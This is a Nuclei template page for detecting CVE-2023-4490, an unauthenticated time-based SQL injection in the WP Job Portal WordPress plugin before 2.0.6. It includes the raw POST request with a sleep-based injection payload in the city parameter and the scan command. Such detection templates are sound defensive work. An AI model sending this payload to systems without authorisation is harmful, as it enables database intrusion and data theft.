Skip to content
Nuclei Templates

WordPress Job Portal < 2.0.6 - SQL Injection

ID: CVE-2023-4490

Severity: high

Author: paresh_parmar1,Configtea

Tags: cve,cve2023,sqli,wp,wordpress,wp-plugin,wp-job-portal,time-based-sqli

Description

Section titled “Description”

The WP Job Portal WordPress plugin before 2.0.6 does not sanitise and escape the city parameter before using it in a SQL statement,leading to a SQL injection vulnerability that is exploitable by unauthenticated users. This vulnerability can be used to extractsensitive data from the database or potentially compromise the WordPress installation.

YAML Source

Section titled “YAML Source”
id: CVE-2023-4490


info:
  name: WordPress Job Portal < 2.0.6 - SQL Injection
  author: paresh_parmar1,Configtea
  severity: high
  description: |
    The WP Job Portal WordPress plugin before 2.0.6 does not sanitise and escape the city parameter before using it in a SQL statement,leading to a SQL injection vulnerability that is exploitable by unauthenticated users. This vulnerability can be used to extractsensitive data from the database or potentially compromise the WordPress installation.
  remediation: Update to version 2.0.6 or later
  reference:
    - https://wpscan.com/vulnerability/986024f0-3c8d-44d8-a9c9-1dd284d7db0d/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4490
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.6
    cwe-id: CWE-89
    cve-id: CVE-2023-4490
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="/wp-content/plugins/wp-job-portal"
  tags: cve,cve2023,sqli,wp,wordpress,wp-plugin,wp-job-portal,time-based-sqli


http:
  - raw:
      - |
        @timeout: 25s
        POST /wp-job-portal-jobseeker-controlpanel/jobs HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        jobtitle=aaaa&salarytype=&salaryfixed=&salarymin=&salarymax=&salaryduration=2&duration=&city=(select*from(select(sleep(7)))a)&metakeywords=&save=Search+Job&default_longitude=71.2577233&default_latitude=29.1411551&issearchform=1&WPJOBPORTAL_form_search=WPJOBPORTAL_SEARCH&wpjobportallay=jobs


    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'contains(body, "wp-content/plugins/wp-job-portal")'
          - 'status_code == 200'
        condition: and
# digest: 4b0a00483046022100bfd6e1c822d4616a40883dd2043685c331d6646fd99a08dbb5fcf56f5038ad1c022100c0c8b28d53d4d275a1ac694be2f4f010322fcaecf819a06ab9319e2013df8d3e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-4490.yaml"

View on Github